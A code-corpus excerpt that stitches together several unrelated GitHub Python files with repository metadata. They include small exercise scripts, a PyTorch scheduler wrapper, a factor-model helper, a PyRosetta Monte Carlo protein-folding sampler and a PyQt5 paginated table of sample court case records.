| 2019-11-03T17:34:26
| 2019-11-03T17:34:26
| 208,722,306
| 0
| 1
| null | 2019-11-03T17:23:40
| 2019-09-16T06:06:06
|
Python
|
UTF-8
|
Python
| false
| false
| 33
|
py
|
xyz=str(input())
print(len(xyz))
|
[
"kalaiyarazan.v@gmail.com"
] |
kalaiyarazan.v@gmail.com
|
556bd1178bb1f303a3bdf90522bf60abc26e0877
|
11b5bd6806447a9b2ef4d8d54a9dc64c8be5d6e5
|
/src/optimizers/schedulers/multiplicative_lr.py
|
416d6d20f06bafe37335a66d375ada4e92b29f45
|
[] |
no_license
|
milySW/NNResearchAPI
|
0789478791a91002d79dd909fe5f9654deeb4b44
|
00bbea4909d1272f80455edb692b45c6c6d56831
|
refs/heads/master
| 2023-04-17T19:56:19.667177
| 2021-05-03T23:48:26
| 2021-05-03T23:48:26
| 291,540,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 325
|
py
|
from torch.optim.lr_scheduler import MultiplicativeLR as TorchMultiplicativeLR
from src.base.scheduler import BaseScheduler
class MultiplicativeLR(BaseScheduler, TorchMultiplicativeLR):
__doc__ = TorchMultiplicativeLR.__doc__
def __init__(self, optimizer, **kwargs):
super().__init__(optimizer, **kwargs)
|
[
"gajowczyk.milosz@gmail.com"
] |
gajowczyk.milosz@gmail.com
|
eafc3e3e7bd5e21ff2097a00bdaa5451de58476b
|
fcdb69b396258c1e3105dbfe1fcd50cc73f7b8cf
|
/Digite3numeros.py
|
79bd3cf1b848415c3edc20bc3da0e501db723940
|
[] |
no_license
|
l0rennareis/Algoritmo
|
6b7147be1bb21e084c0ccfcc77d61cedd93e13fe
|
f73a1cbc0ab773b755d756cc2bf8e5cc758a50b4
|
refs/heads/master
| 2021-03-19T07:25:50.806907
| 2017-06-23T22:50:13
| 2017-06-23T22:50:13
| 94,377,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 370
|
py
|
n1=int(input("digite numero: "))
n2=int(input("digite numero: "))
n3=int(input("digite numero: "))
print (n1)
print (n2)
print (n3)
if n1>n2>n3:
print (n3,n2,n1)
elif n1>n3>n2:
print (n2,n3,n1)
elif n2>n1>n3:
print (n3,n1,n2)
elif n2>n3>n1:
print (n1,n3,n2)
elif n3>n2>n1:
print (n1,n2,n3)
elif n3>n1>n2:
print (n3,n2,n1)
|
[
"noreply@github.com"
] |
l0rennareis.noreply@github.com
|
31c17d7e820daed91a22a6e437066125b32441a3
|
a3f206af3878e2fff0437863a5c0d2d800295814
|
/solutions/prob11650/solution_python.py
|
f199e1e2d76515db507a12104bfc50658824c8ae
|
[] |
no_license
|
soarhigh03/baekjoon-solutions
|
0cdcec30825a00074a982b380ae2f2ddee5e3f54
|
8161cdda184e4e354be4eafe2b4fa2bd48635fa4
|
refs/heads/master
| 2023-01-04T10:42:32.882285
| 2020-10-24T02:20:48
| 2020-10-24T02:20:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
"""
Baekjoon Online Judge #11650
https://www.acmicpc.net/problem/11650
"""
N = int(input())
points = []
for _ in range(N):
point = tuple(map(int, input().split()))
points.append(point)
points.sort()
for point in points:
print(point[0], point[1])
|
[
"loop.infinitely@gmail.com"
] |
loop.infinitely@gmail.com
|
43d8be24a71967b0f1da893e4c205887492daccf
|
a0ba44f11c7744f94293cc87bc794e99174374c5
|
/src/astro/__init__.py
|
e424d9348777991dfcc98d7b07d3e9bc0e0ecc3c
|
[] |
no_license
|
srswinde/astro
|
2d1fec6c6c51935a97c3da07c7cb00359975fc6b
|
bbd46e741bdc543ce5862dd7f36d0952c43e5ac7
|
refs/heads/master
| 2021-01-20T14:49:52.840690
| 2018-05-30T05:16:24
| 2018-05-30T05:16:24
| 90,679,111
| 0
| 0
| null | 2018-10-31T20:30:17
| 2017-05-08T22:47:01
|
Python
|
UTF-8
|
Python
| false
| false
| 123
|
py
|
from angles import Hour_angle, RA_angle, Dec_angle, Deg10, Angle
import time
import math
from astrolib2 import starDate
|
[
"scott@mogit.as.arizona.edu"
] |
scott@mogit.as.arizona.edu
|
80f852a7e4f8ac5b6c722e26b343afb62a37c251
|
e18336fcffd73131e9a51c0b5b81fcaa7353489b
|
/jojojo.py
|
8c842b4c379a5cf588317300edae02b0d634bfc2
|
[] |
no_license
|
Dopamine101/Prepro
|
0603f66be24159016f66c06dcfefe18c5afa3d7d
|
168475b2337a08e0a8ccbc97e66a716fb3a42e92
|
refs/heads/main
| 2023-06-12T04:12:32.359695
| 2021-07-05T11:06:39
| 2021-07-05T11:06:39
| 383,110,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
"""Broken heart boy"""
def date():
"""print"""
toom = input()
ivayne = int(input())
sees = toom+"\n"
print(sees * ivayne)
date()
|
[
"noreply@github.com"
] |
Dopamine101.noreply@github.com
|
178eb8eb639adbbf17d5a555b08e90e92ba2b6d8
|
f0141f1b4bbf4555fcf96d2a297e2e3d61855e35
|
/model/parameters.py
|
35e0a1d64e0493fbead6457d977e6f4a709cc709
|
[
"MIT"
] |
permissive
|
JakartaLaw/bayesianfactormodel
|
b286b00d05edfc780cd2c31f25aad9363d7c2e39
|
0a75412d965ae2ed5c093315cb27f82d4a578590
|
refs/heads/master
| 2020-04-07T07:49:51.835924
| 2018-11-29T17:02:19
| 2018-11-29T17:02:19
| 158,190,409
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,986
|
py
|
import numpy as np
import pandas as pd
from collections import defaultdict
from model.parameterframe import ParameterFrame
from model.plotter import Plotter
from collections import defaultdict
class Parameters(Plotter):
def __init__(self, trace_df):
super().__init__(trace_df)
@property
def k():
p, k = self.get_dimensions()
return k
@property
def p():
p, k = self.get_dimensions()
return p
def _calc_param_mean_dict(self, skip_obs=None):
try:
self._calc_helper_param_mean_dict(skip_obs=skip_obs)
except AttributeError:
self._calc_param_trace_dict()
self._calc_helper_param_mean_dict(skip_obs=skip_obs)
def _calc_helper_param_mean_dict(self, skip_obs):
self.param_mean_dict = dict()
for param_name in self.trace_df.columns:
param_obs = self.trace_df[param_name][skip_obs:]
self.param_mean_dict[param_name] = np.mean(param_obs)
def params_to_df(self):
params_unordered = self._convert_to_dimension_dict()
params_ordered = self._order_to_df(params_unordered)
return pd.DataFrame(params_ordered)
def _convert_to_dimension_dict(self):
#self.k, self.p
param_to_df_unordered = defaultdict(list)
for param_name, param_val in self.param_mean_dict.items():
(d1, d2) = self._decompose_column_index(param_name)
param_to_df_unordered[d2].append((d1, param_val))
return param_to_df_unordered
def _order_to_df(self, param_to_df_unordered):
params_to_df = dict()
for key, tup_list in param_to_df_unordered.items():
params_to_df[key] = self._return_ordered_by_index_params(tup_list)
return params_to_df
@staticmethod
def _return_ordered_by_index_params(tup_list):
def sorter(tup): return tup[0]
tup_list.sort(key=sorter)
return [tup[1] for tup in tup_list]
|
[
"Jeppe@Jeppes-MacBook-Pro.local"
] |
Jeppe@Jeppes-MacBook-Pro.local
|
e76767b8387ac2db7f8fa709a10ce6fac53354c9
|
c202e9185995d9bf2d8ae4dc5ec054ae1c481901
|
/Project 3/code/FragmentSampler.py
|
f51f431d19f1fc030cce31e2420c03560e84f6fb
|
[] |
no_license
|
terryli710/BEIOMEDIN214
|
a48ba30689f2a78a81d1b47f7a1fdce1048c2b62
|
aecec061d2194748da5204d56a55b6def9642f9f
|
refs/heads/master
| 2023-01-24T10:44:13.188814
| 2020-11-29T04:25:48
| 2020-11-29T04:25:48
| 296,722,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,041
|
py
|
"""
This file contains the main fragment sampling class, which performs a Monte Carlo simulated annealing procedure to fold a protein.
"""
from pyrosetta import *
init(extra_options='-mute all -constant_seed')
from Bio.SeqIO import parse
import math
import utils
from Protein import Protein
from FragmentSet import FragmentSet
from typing import Union, Tuple
import os
import random
class MCMCSampler(object):
def __init__(self, fasta: str, logdir: str = None, start_pdb: Union[str, None] = None, sample_size=50,
annealing_rate=0.999):
"""
Initializing a MCMC sampler for certain protein
The score function is given to you (Rosetta centroid score function)
:param fasta: name fasta file
:param sample_size: size of candidate fragments in each position
attributes:
scorefxn: score function, callable
target_pose: goal pose, rosetta pose object
protein: Protein class
fragment_set: FragmentSet class
self.candidate_frag: store calculated candidate fragments
self.mers: k-mer
self.temp: current temperature
self.t_end: set ending temperature
"""
## 0
# set log
self.logdir = logdir
## 1
# set score function
self.scorefxn = create_score_function('score3')
## 2
# read pdb file (goal position)
# pose_from_pdb doesn't take absolute dir
self.protein_name = fasta.split('.')[0]
self.target_pose = pose_from_pdb(self.protein_name + '.pdb')
## 3
# read fasta file (protein)
fasta_path = os.path.join(self.protein_name + '.fasta')
iter = parse(fasta_path, 'fasta')
seq = next(iter)
# initialize protein, either from seq or from start_pdb
if start_pdb:
os.chdir(os.path.dirname(start_pdb))
self.protein = Protein(pose=pose_from_pdb(os.path.basename(start_pdb)))
else:
self.protein = Protein(sequence=seq.seq._data)
# store initial pdb
self.initial_protein = Protein(sequence=seq.seq._data)
## 4
# get fragment set
self.fragment_set = {"9mers": FragmentSet(os.path.join(self.protein_name + "_9mers.frag"),
os.path.join(self.protein_name + "_9mers.rmsd")),
"3mers": FragmentSet(os.path.join(self.protein_name + "_3mers.frag"),
os.path.join(self.protein_name + "_3mers.rmsd"))}
## 5
# parametrize candidate_frag_dict
self.candidate_frag = {"9mers": {}, "3mers": {}}
for pos in range(1, self.fragment_set["9mers"].length + 1):
self.candidate_frag["9mers"][pos] = self.fragment_set["9mers"].get_lowRMS_fragments(pos, sample_size)
for pos in range(1, self.fragment_set["3mers"].length + 1):
self.candidate_frag["3mers"][pos] = self.fragment_set["3mers"].get_lowRMS_fragments(pos, sample_size)
## 6
# set temperature
self.temp = 100
self.t_end = 0.1
## 7
# set anneal rate
self.annealing_rate = annealing_rate
return
def compute_energy(self, protein: Union[Protein, None] = None) -> float:
"""
compute energy of protein.
Hint: look at utils.py
--------
Params:
- protein (Protein object): protein to score
Return:
- energy of conformation (float)
"""
# NOTE: score_pose cannot take absolute directory
if protein:
return utils.score_pose(protein.pose, self.scorefxn)
else:
return utils.score_pose(self.protein.pose, self.scorefxn)
def perturb_fragment(self, pos: int, mer: str = "9mers",
protein: Union[Protein, None] = None) -> Tuple[
Protein, int]: # you may want to add more arguments
"""
Sample from possible fragments for a position, and replace torsion angles of that fragment in the protein.
Store fragment candidate at certain position (call get_lowRMS just once.)
:param protein: optional parameter, if none, use self.protein
:param pos: position to change
:param mer: mode of function, either "3mers" or "9mers"
:return: new Protein with updated angles
"""
# set a new_pose (protein)
if not protein:
new_protein = Protein(pose=self.protein.pose)
else:
new_protein = Protein(pose=protein.pose)
# sample candidate fragment
random_index = random.randint(0, len(self.candidate_frag[mer][pos]) - 1)
frag_chosen = self.candidate_frag[mer][pos][random_index]
frag_index = self.fragment_set[mer].findFragIndex(pos, frag_chosen)
# insert this fragment and return
if mer == "9mers":
frag_length = 9
else:
frag_length = 3
for i in range(frag_length):
new_protein.set_torsion(pos + i, frag_chosen[i][0], frag_chosen[i][1])
return new_protein, frag_index
def metropolis_accept(self, new_protein: Protein) -> float: # you may want to add more arguments
"""
Calculate probability of accepting or rejecting move based on Metropolis criterion.
:param new_protein: candidate protein to be calculated and compared
:return: probability of accepting
"""
delta_e = self.compute_energy(new_protein) - self.compute_energy()
# formula: if delta_E > 0: exp(-delta_E/kT)
return math.exp(-delta_e / self.temp) if delta_e > 0 else 1
def anneal_temp(self) -> bool:
"""
Anneal temperature using exponential annealing schedule.
Consider kT to be a single variable (i.e. ignore Boltzmann constant)
:return whether it reached the threshold
"""
assert self.temp > self.t_end, "Temperature has reached threshold"
self.temp *= self.annealing_rate
if self.temp <= self.t_end:
return True
else:
return False
def step(self, verbose=0) -> bool:
"""
Take a single MCMC step. Each step should do the following:
1. sample position in chain
- Note: think about positions you can sample a k-mer fragment from.
For example, you cannot sample from position 1 because there is no phi angle
2. sample fragment at that position and replace torsions in a *copied version* of the protein
3. measure energy after replacing fragment
4. accept or reject based on Metropolis criterion
- if accept: incorporate proposed insertion and anneal temperature
- if reject: sample new fragment (go to step 3)
"""
accept = 0
i = 0
done = False
if self.temp > 1:
mer_str = "9mers"
else:
mer_str = "3mers"
# 1. sample position in chain (e.g. len=10, 3-mers, should sample {1,...,7})
sampled_pos = random.randint(1, self.fragment_set[mer_str].length)
# get number of frag in this position
pool_size = len(self.candidate_frag[mer_str][sampled_pos])
sampled_set = set()
# if accepted or sampled all frags and cannot decide, keep going
while not accept and len(sampled_set) < pool_size:
# 2. replace torsions in a *copied version* of the protein
new_protein, index = self.perturb_fragment(sampled_pos, mer=mer_str)
# add to set
sampled_set.add(index)
# 3. 4. measure energy and decide
prob = self.metropolis_accept(new_protein)
accept = random.uniform(0, 1) < prob
if accept:
# incorporate proposed insertion and anneal temperature
self.protein = new_protein
done = self.anneal_temp()
# if reject: sample new fragment (go to step 2)
i += 1
if verbose:
if accept:
print("sampled position = {}, take {} iter to finish, prob is {}".format(sampled_pos, i, prob))
elif len(sampled_set) == pool_size:
print("sampled position = {}, didn't accept any frags".format(sampled_pos))
return done
def savelog(self, log: dict, file_name: str) -> None:
"""
save log of sim
:param log: log information
:param file_name: saved path
"""
saved_log = "iteration" + "\t" + "\t".join(log.keys()) + "\n"
iter = 1
for row in range(len(log["energy"])):
saved_log += str(iter) + "\t"
saved_log += "\t".join(str(log[key][iter - 1]) for key in log.keys())
saved_log += "\n"
iter += 1
with open(file_name, "w") as f:
f.write(saved_log)
def storeSim(self, best_pdb: Protein, log: dict, sim_index: int) -> Tuple[str, str, int]:
"""
Store best pdb and log text file to log
:param best_pdb: the structure to store as "best.pdb"
:param log: log dict to store
:param sim_index: int of simulation number
:return path to sim folder, path to log folder, sim
"""
# dealing with paths
if not self.logdir:
cur_dir = os.getcwd()
log_folder_name = self.protein_name + "_log"
log_folder_path = os.path.join(cur_dir, log_folder_name)
else:
log_folder_path = self.logdir
if not os.path.exists(log_folder_path):
os.mkdir(log_folder_path)
sim_folder_name = "sim_" + self.__toStr__(sim_index)
sim_folder_path = os.path.join(log_folder_path, sim_folder_name)
# avoid path exist error
if not os.path.exists(sim_folder_path):
os.mkdir(sim_folder_path)
# store things
# 1. initial pdb
self.initial_protein.save_pdb(os.path.join(sim_folder_path, "initial.pdb"))
# 2. target pdb
target_protein = Protein(pose=self.target_pose)
target_protein.save_pdb(os.path.join(sim_folder_path, "target.pdb"))
# 3. best pdb
best_pdb.save_pdb(os.path.join(sim_folder_path, "best.pdb"))
# 6. log.txt
self.savelog(log, os.path.join(sim_folder_path, sim_folder_name + "_log.txt"))
return sim_folder_path, log_folder_path, sim_index
@staticmethod
def __toStr__(integer) -> str:
"""
convert integer to formatted string
:param integer: integer to be converted
:return: string
"""
if integer < 10:
return "0" + str(integer)
else:
return str(integer)
def simulate(self, sim_index: int, seed: int = 9001) -> Tuple[int, float, float]:
"""
Run full MCMC simulation from start_temp to end_temp.
Be sure to save the best (lowest-energy) structure, so you can access it after.
It is also a good idea to track certain variables during the simulation (temp, energy, and more).
:param sim_index: simulation index
:param seed: int
:return: log information
"""
random.seed(seed)
log = {"temperature": [], "energy": []}
while True:
if self.step():
# store best pdb
sim_path, log_folder_path, sim_index = self.storeSim(self.protein, log, sim_index)
# calculate relaxed, cd to the folder!!
cur_dir = os.getcwd()
os.chdir(sim_path)
protein, rmsd, score = utils.relax("best.pdb",
"target.pdb")
os.chdir(cur_dir)
break
else:
# keep track of log
log['temperature'].append(self.temp)
log['energy'].append(self.compute_energy())
return sim_index, score, rmsd
|
[
"li.terry710@gmail.com"
] |
li.terry710@gmail.com
|
96b0c3d56f99985a786d35c32dcd60fc90857ec2
|
41bb733fd028a62961d516847cf9bc4fecc400d8
|
/Pagination/PageView.py
|
899012f54e7f70ce61c9600dfa191af20ce62f11
|
[] |
no_license
|
TcMysunshine/PyQtExample
|
696ac823024d739cf85bd9a4dd7d3de09dd54f3d
|
cfda8a5fd0cf201c9ba0691562bd9a8eb97f791f
|
refs/heads/master
| 2020-04-01T23:04:18.781429
| 2018-10-25T01:44:29
| 2018-10-25T01:44:29
| 153,740,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,252
|
py
|
import sys
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import QtCore
from PyQt5.QtGui import *
import math
class PageView(QWidget):
def __init__(self, data, titles, keys, dataRow=10, dataCol=4):
super(PageView, self).__init__()
self.resize(960, 790)
#当前页数
self.currentPage = 1
#列数
self.dataCol = dataCol
#每一页展示数据行数
self.dataRow = dataRow
#height
self.height = self.dataRow * 70
# 每一列的标题
self.titles = titles
self.titles.append("操作")
#数据中的key
self.keys = keys
# 总数据
self.data = data
# 获取数据长度
self.length = len(data)
# 获取数据可分的页数
# //向上取整, /是得到小数
self.pageNum = math.ceil((self.length / self.dataRow))
# print(str(self.length) + ":" + str(self.dataRow)+":"+str(self.pageNum))
#建立UI
self.setUpUI()
def setUpUI(self):
# 上一页
self.preButton = QPushButton("上一页", self)
self.preButton.setGeometry(QtCore.QRect(800, self.height + 10, 50, 20))
self.preButton.clicked.connect(self.backToLastPage)
# 下一页
self.nextButton = QPushButton("下一页", self)
self.nextButton.setGeometry(QtCore.QRect(860, self.height + 10, 50, 20))
self.nextButton.clicked.connect(self.forwardToNextPage)
# 总页数
self.totalPageLabel = QLabel(self)
self.totalPageLabel.setGeometry(QtCore.QRect(640, self.height + 10, 60, 20))
self.totalPageLabel.setText("总共" + str(self.pageNum) + "页")
# 当前页
self.currentPageLabel = QLabel(self)
self.currentPageLabel.setGeometry(QtCore.QRect(700, self.height + 10, 60, 20))
self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
# 转到第几页
self.label1 = QLabel(self)
self.label1.setGeometry(QtCore.QRect(760, self.height + 40, 40, 20))
self.label1.setText("转到第")
self.turnToPage = QLineEdit(self)
self.turnToPage.setGeometry(QtCore.QRect(805, self.height + 40, 20, 20))
self.turnToPage.setText(str(self.currentPage))
# 转到第几页
self.label1 = QLabel(self)
self.label1.setGeometry(QtCore.QRect(825, self.height + 40, 20, 20))
self.label1.setText("页")
# 到达指定页
self.targetPageButton = QPushButton("Go", self)
self.targetPageButton.setGeometry(QtCore.QRect(860, self.height + 40, 50, 20))
self.targetPageButton.clicked.connect(self.goToTargetPage)
#布局
self.layoutWidget = QWidget(self)
self.layoutWidget.setGeometry(QtCore.QRect(0, 0, 950, self.height))
self.layout = QVBoxLayout(self.layoutWidget)
#返回上一页
def backToLastPage(self):
# print("previous")
self.currentPage -= 1
if self.currentPage <= 0:
# print("到达第一页")
QMessageBox.warning(self, "提示", "当前已是第一页")
self.currentPage = 1
else:
self.layout.removeWidget(self.tableView)
# self.model.clear()
# self.tableView.reset()
# self.model.removeRows(0, 5)
self.renderData()
self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
#返回下一页
def forwardToNextPage(self):
# print("next")
self.currentPage += 1
#到达最后一页
if self.currentPage >= self.pageNum + 1:
QMessageBox.warning(self, "提示", "当前已到达最后一页")
self.currentPage = self.pageNum
else:
self.layout.removeWidget(self.tableView)
self.renderData()
self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
#到达指定页
def goToTargetPage(self):
self.turnToPageValue = int(self.turnToPage.text())
if self.turnToPageValue > self.pageNum or self.turnToPageValue < 1:
QMessageBox.warning(self, "提示", "指定页不存在,超出范围")
else:
self.layout.removeWidget(self.tableView)
self.currentPage = self.turnToPageValue
# self.model.clear()
self.renderData()
self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
def renderData(self):
#获取当前需要渲染的数据
self.setCurrentData()
#当前行
rowNum = len(self.currentData)
self.model = QStandardItemModel(rowNum, self.dataCol + 1)
# 设置头
self.model.setHorizontalHeaderLabels(self.titles)
self.tableView = QTableView(self.layoutWidget)
# height = self.dataRow * 35
self.tableView.resize(950, self.height + 200)
self.tableView.verticalHeader().setDefaultSectionSize(62)
self.tableView.setColumnWidth(1, 350)
#填充数据
for row in range(rowNum):
for col in range(self.dataCol):
tempValue = self.currentData[row][self.keys[col]]
if col > 1:
value = str(tempValue)[0:10]
else:
value = str(tempValue)
item = QStandardItem(value)
# 居中显示
item.setTextAlignment(Qt.AlignCenter)
# 不可编辑
item.setEditable(False)
self.model.setItem(row, col, item)
#填充数据
self.tableView.setModel(self.model)
# 水平方向标签拓展剩下的窗口部分,填满表格
self.tableView.horizontalHeader().setStretchLastSection(True)
# #水平方向,表格大小拓展到适当的尺寸
self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
#添加按钮
for buttonRow in range(rowNum):
index = self.model.index(buttonRow, self.dataCol)
self.tableView.setIndexWidget(index, self.buttonForRow(self.currentData[buttonRow]['ajxh']))
self.layout.addWidget(self.tableView)
#点击查看按钮传递案件序号
def viewTable(self, id):
print(id)
# 列表内添加按钮
def buttonForRow(self, id):
widget = QWidget()
# 查看
viewBtn = QPushButton('查看')
viewBtn.setStyleSheet(''' text-align : center;
background-color : DarkSeaGreen;
height : 30px;
border-style: outset;
font : 13px; ''')
# 传入参数时要加入lambda
viewBtn.clicked.connect(lambda: self.viewTable(id))
#布局
hLayout = QHBoxLayout()
hLayout.addWidget(viewBtn)
hLayout.setContentsMargins(5, 2, 5, 2)
widget.setLayout(hLayout)
return widget
#将数据渲染表格
# def renderTable(self):
# self.tableView = QTableView(self)
# # height = self.dataRow * 35
# self.tableView.resize(750, self.height)
# self.tableView.setModel(self.model)
# # 水平方向标签拓展剩下的窗口部分,填满表格
# self.tableView.horizontalHeader().setStretchLastSection(True)
# # #水平方向,表格大小拓展到适当的尺寸
# self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
# self.tableView.se
# self.layout.addWidget(self.tableView)
# self.vlayout = QHBoxLayout()
# self.layout.addWidget(self.vlayout)
#设置当前需要展示的数据
def setCurrentData(self):
start = (self.currentPage - 1) * self.dataRow
end = self.currentPage * self.dataRow
#最后一页
if self.currentPage == self.pageNum:
self.currentData = self.data[start:self.length]
elif self.currentPage < self.pageNum:
self.currentData = self.data[start:end]
if __name__ == '__main__':
app = QApplication(sys.argv)
data = {
"succeed": True,
"message": None,
"object": [
{
"ajxh": 62578,
"ah": "(2018)津民申646号",
"ajmc": "天津市润辉建筑发展有限公司与王作录建设工程分包合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-02-05T16:00:00.000+0000",
"jarq": "2018-04-23T08:16:04.000+0000"
},
{
"ajxh": 62479,
"ah": "(2018)津民终83号",
"ajmc": "陕西瑞中贸易有限公司,天津京铁火车头足球俱乐部有限公司不当得利纠纷",
"ajxz": "2",
"spcx": "2",
"spcxdz": "29",
"baspt": "06 ",
"larq": "2018-01-29T16:00:00.000+0000",
"jarq": "2018-07-26T09:28:27.000+0000"
},
{
"ajxh": 62376,
"ah": "(2018)津民申583号",
"ajmc": "张树强与南开大学人事争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-03-27T07:03:19.000+0000"
},
{
"ajxh": 62387,
"ah": "(2018)津民申591号",
"ajmc": "李艳卜与天津市保安服务总公司河西分公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:39.000+0000"
},
{
"ajxh": 62243,
"ah": "(2018)津民申497号",
"ajmc": "天津金地康成投资有限公司与李睿雅劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:19.000+0000"
},
{
"ajxh": 62245,
"ah": "(2018)津民申499号",
"ajmc": "宋金美与天津达璞瑞科技有限公司劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:41.000+0000"
},
{
"ajxh": 62101,
"ah": "(2018)津民申430号",
"ajmc": "天津众起模具制造有限公司,张义宽劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:18.000+0000"
},
{
"ajxh": 62115,
"ah": "(2018)津民申441号",
"ajmc": "许莹,天津市弘野建筑工程有限公司,天津市塘沽海洋高新技术开发总公司建设工程施工合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-04-16T08:19:09.000+0000"
},
{
"ajxh": 62090,
"ah": "(2018)津民申420号",
"ajmc": "陈志森,天津利顺德大饭店有限公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-16T16:00:00.000+0000",
"jarq": "2018-04-10T06:27:09.000+0000"
},
{
"ajxh": 61755,
"ah": "(2018)津民申206号",
"ajmc": "白雪樱与天津市外国企业专家服务有限公司开发区分公司,天津瑞金国际学校,新地平线国际教育管理(天津)有限公司等劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-10T16:00",
"jarq": "2018-04-10T06:27:09.000+0000"
},
{
"ajxh": 62578,
"ah": "(2018)津民申646号",
"ajmc": "陕西瑞中贸易有限公司,天津京铁火车头足球俱乐部有限公司不当得利纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-02-05T16:00:00.000+0000",
"jarq": "2018-04-23T08:16:04.000+0000"
},
{
"ajxh": 62479,
"ah": "(2018)津民终83号",
"ajmc": "天津市润辉建筑发展有限公司与王作录建设工程分包合同纠纷",
"ajxz": "2",
"spcx": "2",
"spcxdz": "29",
"baspt": "06 ",
"larq": "2018-01-29T16:00:00.000+0000",
"jarq": "2018-07-26T09:28:27.000+0000"
},
{
"ajxh": 62376,
"ah": "(2018)津民申583号",
"ajmc": "张树强与南开大学人事争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-03-27T07:03:19.000+0000"
},
{
"ajxh": 62387,
"ah": "(2018)津民申591号",
"ajmc": "李艳卜与天津市保安服务总公司河西分公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:39.000+0000"
},
{
"ajxh": 62243,
"ah": "(2018)津民申497号",
"ajmc": "天津金地康成投资有限公司与李睿雅劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:19.000+0000"
},
{
"ajxh": 62115,
"ah": "(2018)津民申441号",
"ajmc": "许莹,天津市弘野建筑工程有限公司,天津市塘沽海洋高新技术开发总公司建设工程施工合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-04-16T08:19:09.000+0000"
},
{
"ajxh": 62245,
"ah": "(2018)津民申499号",
"ajmc": "宋金美与天津达璞瑞科技有限公司劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:41.000+0000"
},
{
"ajxh": 62101,
"ah": "(2018)津民申430号",
"ajmc": "天津众起模具制造有限公司,张义宽劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:18.000+0000"
},
{
"ajxh": 62115,
"ah": "(2018)津民申441号",
"ajmc": "许莹,天津市弘野建筑工程有限公司,天津市塘沽海洋高新技术开发总公司建设工程施工合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-04-16T08:19:09.000+0000"
},
{
"ajxh": 62090,
"ah": "(2018)津民申420号",
"ajmc": "陈志森,天津利顺德大饭店有限公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-16T16:00:00.000+0000",
"jarq": "2018-04-10T06:27:09.000+0000"
},
{
"ajxh": 61755,
"ah": "(2018)津民申206号",
"ajmc": "白雪樱与天津市外国企业专家服务有限公司开发区分公司,天津瑞金国际学校,新地平线国际教育管理(天津)有限公司等劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-10T16:00",
"jarq": "2018-04-10T06:27:09.000+0000"
}
]
}
# jsonData = json.load(data)
titles = ['案号', '案件名称', '立案日期', '结案日期']
keys = ['ah', 'ajmc', 'larq', 'jarq']
# print(data['object'])
pageView = PageView(data['object'], titles, keys)
pageView.renderData()
# # pageView.renderTable()
pageView.show()
sys.exit(app.exec_())
|
[
"2229238008@qq.com"
] |
2229238008@qq.com
|
366f05348d78f59d0cfb7084d1df801404cd8b81
|
7bc54bae28eec4b735c05ac7bc40b1a8711bb381
|
/src/tlm/ukp/data_gen/token_as_label_payload_worker.py
|
81026196e20a97d70f190756bed467c07997b9b6
|
[] |
no_license
|
clover3/Chair
|
